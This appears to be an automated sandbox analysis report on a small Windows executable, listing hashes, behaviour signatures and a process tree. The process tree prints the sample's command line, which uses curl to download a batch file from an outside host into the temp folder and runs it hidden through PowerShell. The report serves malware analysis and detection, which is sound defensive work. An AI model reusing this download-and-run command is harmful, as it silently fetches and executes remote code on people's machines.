Analysis
-
max time kernel
31s -
max time network
37s -
platform
windows7_x64 -
resource
win7-20230703-en -
resource tags
arch:x64arch:x86image:win7-20230703-enlocale:en-usos:windows7-x64system -
submitted
04-07-2023 13:33
Static task
static1
1 signatures
Behavioral task
behavioral1
Sample
a299e230a172c79e5d30de052.exe
Resource
win7-20230703-en
windows7-x64
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
a299e230a172c79e5d30de052.exe
Resource
win10v2004-20230621-en
windows10-2004-x64
15 signatures
150 seconds
General
-
Target
a299e230a172c79e5d30de052.exe
-
Size
3KB
-
MD5
a299e230a172c79e5d30de052cefaddc
-
SHA1
9ac47e62085f05a4ce58bd999332ab04fee40e30
-
SHA256
177b40f96a09a3919b2c8846ca73abb09855d078ff9dee89610bc2b75d44cb31
-
SHA512
0ca74bb6c51bc374be01402aa8e4a284c1730c49ba6ba1425871c754e1dfd8a7b7bfe92dd6e854941f299e724488ef5474f92253001503a8f38531b395e6b509
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1308 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1308 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2308 wrote to memory of 1776 2308 a299e230a172c79e5d30de052.exe 29 PID 2308 wrote to memory of 1776 2308 a299e230a172c79e5d30de052.exe 29 PID 2308 wrote to memory of 1776 2308 a299e230a172c79e5d30de052.exe 29 PID 1776 wrote to memory of 1308 1776 cmd.exe 31 PID 1776 wrote to memory of 1308 1776 cmd.exe 31 PID 1776 wrote to memory of 1308 1776 cmd.exe 31
Processes
-
C:\Users\Admin\AppData\Local\Temp\a299e230a172c79e5d30de052.exe"C:\Users\Admin\AppData\Local\Temp\a299e230a172c79e5d30de052.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2308 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c curl -o %temp%\v8pb4a2bgu.bat https://upload.nugeta.net/uploads/Uni.bat & powershell start -WindowStyle hidden %temp%\v8pb4a2bgu.bat2⤵
- Suspicious use of WriteProcessMemory
PID:1776 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell start -WindowStyle hidden C:\Users\Admin\AppData\Local\Temp\v8pb4a2bgu.bat3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1308
-
-